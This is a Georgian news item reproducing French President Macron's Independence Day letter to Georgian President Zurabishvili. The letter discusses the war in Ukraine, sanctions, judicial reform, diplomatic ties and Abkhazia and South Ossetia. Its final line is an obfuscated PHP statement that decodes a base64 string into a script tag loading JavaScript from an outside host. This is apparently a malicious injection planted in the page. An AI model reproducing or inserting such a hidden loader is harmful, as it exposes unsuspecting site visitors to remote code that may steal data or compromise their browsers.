celsiusi
ავერსი შნაიდერი
საფრანგეთის პრეზიდენტი ემანუელ მაკრონი საქართველოს დამოუკიდებლობის დღესთან დაკავშირებით საქართველოს პრეზიდენტ სალომე ზურაბიშვილს წერილს უგზავნის.
 
„საქართველოს დამოუკიდებლობის დღესთან დაკავშირებით, მოხარული ვარ, გულწრფელად გისურვოთ თქვენ და მთელ ქართველ ხალხს ბედნიერება, კეთილდღეობა და მშვიდობა.
 
თითქმის სამი თვეა, რაც ევროპის კონტინენტი შეიგრძნობს რუსეთის მიერ სუვერენული ქვეყნის, უკრაინის წინააღმდეგ წამოწყებულ მკვლელ აგრესიულ ომს. ამ თავდასხმის წინაშე, რომელიც სერიოზულ ზიანს აყენებს ჩვენი კონტინენტის უსაფრთხოებასა და სტაბილურობას, როგორც არასდროს, აუცილებელია, ევროპის ოჯახმა შეინარჩუნოს ერთიანობა. უკრაინელი ხალხის მხარდაჭერით, იქნება ეს თქვენს ტერიტორიაზე ამჟამად მყოფი მრავალი ლტოლვილის მიღებითა თუ ჰუმანიტარული დახმარების მიწოდებით, ქართველებმა დაადასტურეს თავიანთი სრული ერთგულება ჩვენთვის ასე ძვირფასი ღირებულებების მიმართ. გაერთიანებული ერების ორგანიზაციაში საქართველოს მიერ თანმიმდევრულად მიცემული ხმები რეზოლუციების სასარგებლოდ, რომლებიც მოითხოვდა უკრაინაში ომის დაუყოვნებლივ შეწყვეტას, მოუწოდებდა რუსეთს მშვიდობიან მოსახლეობაზე ყველა თავდასხმის შეწყვეტისკენ და ბოლოს, მას რიცხავდა ადამიანის უფლებების საბჭოდან, ძალიან მნიშვნელოვანი სიგნალი იყო.
 
მაშინ, როცა საქართველომ კიდევ ერთხელ შეძლო, დაემტკიცებინა დემოკრატიის გზის მიმართ თავისი დამაჯერებელი ერთგულება და ახლახან წარადგინა წევრობის კითხვარის მეორე ნაწილი, მნიშვნელოვანია, რომ თქვენმა ქვეყანამ მხარი დაუჭიროს სანქციების ევროპულ პოლიტიკას და ხელი შეუშალოს მოქმედი სანქციების რეჟიმის რუსეთის მიერ გვერდის ავლის მცდელობებს.
 
ჩემთვის ასევე ცნობილია თქვენი სურვილი, განამტკიცოთ კანონის უზენაესობა აუცილებელი რეფორმების გატარებით, სახელდობრ სასამართლო სისტემაში – შეგიძლიათ ჩვენი მტკიცე მხარდაჭერის იმედი გქონდეთ ამ გზაზე.
 
მოგეხსენებათ, რომ 2022 წელს ჩვენი დიპლომატიური ურთიერთობების აღდგენის 30-ე იუბილე აღინიშნება. ამ წლების განმავლობაში, ჩვენ შევძელით, განგვევითარებინა განსაკუთრებული კავშირი, რომელიც ფესვგადგმულია ნდობითა და მეგობრობით გამორჩეულ ჩვენს საერთო ისტორიაში. მოხარული ვარ ამით და გამოვთქვამ იმედს, რომ შევძლებთ, გავაგრძელოთ ჩვენი უკვე სამაგალითო თანამშრომლობა „ამილახვარის“  სტრუქტურული დიალოგის ფარგლებში, რომელიც 2019 წლის თებერვალში გავხსენით.
 
მსურს, კიდევ ერთხელ, ღრმა რწმენით დაგიდასტუროთ ჩვენი ურყევი ერთგულება საქართველოს სრული სუვერენიტეტის მიმართ. როგორც ყოველთვის, საფრანგეთი კვლავ ყურადღებით დააკვირდება აფხაზეთსა და სამხრეთ ოსეთში არსებულ ვითარებას და არ აღიარებს იქ ჩატარებულ არც ერთ ფსევდო-რეფერენდუმს.
 
გთხოვთ, მიიღოთ, ქალბატონო პრეზიდენტო, ჩემი უღრმესი პატივისცემის დასტური“, – აღნიშნავს საფრანგეთის პრეზიდენტი წერილში, რომელსაც საქართველოში საფრანგეთის საელჩო ავრცელებს.
581
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");